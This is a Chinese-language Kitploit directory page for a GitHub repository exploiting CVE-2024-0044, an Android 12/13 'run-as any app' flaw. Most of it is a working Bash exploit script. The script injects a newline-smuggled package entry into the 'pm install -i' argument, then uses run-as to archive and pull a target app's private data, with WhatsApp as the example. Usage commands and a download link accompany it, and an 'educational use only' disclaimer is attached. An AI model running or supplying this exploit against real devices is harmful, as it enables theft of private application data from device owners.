Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/thebl4ckph4nt0m/cve-2024-0044
Android安全漏洞分析漏洞利用渗透测试移动安全学习与教育
GitHubthebl4ckph4nt0m/cve-2024-0044

CVE-2024-0044

CVE-2024-0044:一个影响 Android 12 和 13 版本的高严重性“以任意应用身份运行”漏洞。此仓库演示了如何利用 CVE-2024-0044。仅用于教育和测试目的。

查看仓库
2311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-0044-

CVE-2024-0044:一个影响 Android 12 和 13 的“以任意应用身份运行”高危漏洞

CVE-2024-0044 漏洞利用脚本

此 Bash 脚本演示如何利用 CVE-2024-0044。仅供教育和测试之用。

前提条件

  • 已安装并配置 ADB(Android 调试桥)
  • 已连接并开启 USB 调试的 Android 设备

脚本代码

root@kitploit:~
#!/bin/bash

# Function to exploit CVE-2024-0044
exploit_cve_2024_0044() {
    local url=$1
    local package_name=$2
    local apk_path=$3

    # Generate payload
    local payload="PAYLOAD=\"@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"
pm install -i \"\$PAYLOAD\" /data/local/tmp/$(basename $apk_path)"

    # Push APK to device
    adb push "$apk_path" /data/local/tmp/

    # Execute payload
    adb shell <<< "$payload"

    # Create temporary directory
    adb shell "mkdir /data/local/tmp/wa/"
    adb shell "touch /data/local/tmp/wa/wa.tar"
    adb shell "chmod -R 0777 /data/local/tmp/wa/"

    # Archive target application's data
    adb shell "run-as victim tar -cf /data/local/tmp/wa/wa.tar $package_name"

    # Pull data
    adb pull "/data/local/tmp/wa/wa.tar" "wa_data.tar"
}

# Usage
if [[ $# -ne 3 ]]; then
    echo "Usage: $0 <url> <package_name> <apk_path>"
    echo "Example: $0 https://web.whatsapp.com/ com.whatsapp /path/to/apk.apk"
    exit 1
fi

exploit_cve_2024_0044 "$1" "$2" "$3"

命令

root@kitploit:~
chmod +x exploit_cve_2024_0044.sh
./exploit_cve_2024_0044.sh <url> <package_name> <apk_path>

参数

  • 将 https://web.whatsapp.com/ 替换为实际目标 URL。
  • 将 com.whatsapp 替换为目标软件包名称。
  • 将 /path/to/apk.apk 替换为 APK 文件的路径。
下载工具